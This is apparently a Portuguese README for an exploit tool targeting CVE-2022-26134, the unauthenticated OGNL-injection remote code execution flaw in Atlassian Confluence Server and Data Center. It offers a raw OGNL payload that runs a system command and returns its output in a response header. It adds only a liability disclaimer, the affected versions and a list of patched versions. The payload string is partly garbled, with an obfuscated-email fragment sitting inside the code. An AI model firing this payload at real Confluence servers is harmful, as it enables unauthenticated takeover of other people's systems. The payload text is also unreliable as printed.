BotCon
Execução Remota de Código Não Autenticada no Confluence via Injeção OGNL (CVE-2022-26134)
- Em 02 de junho de 2022, a Atlassian divulgou um aviso de segurança para seus aplicativos Confluence Server e Data Center, destacando uma vulnerabilidade crítica de execução remota de código não autenticada. A vulnerabilidade de injeção OGNL permite que um usuário não autenticado execute código arbitrário em uma instância do Confluence Server ou Data Center.
LEIA ISTO !
Use com cuidado. Você é responsável por suas ações.
Os desenvolvedores não assumem responsabilidade e não são responsáveis por qualquer uso indevido ou dano.

Payload Bruto
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Detalhes do Bug
-
Produto Afetado :
- Confluence
- Confluence Server
- Confluence Data Center
-
Versões Afetadas :
- Todas as versões suportadas do Confluence Server e Data Center são afetadas.
- As versões do Confluence Server e Data Center posteriores à 1.3.0 são afetadas.
Mitigações
- Atualize sua versão do Attlasian Confluence para estas versões corrigidas :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1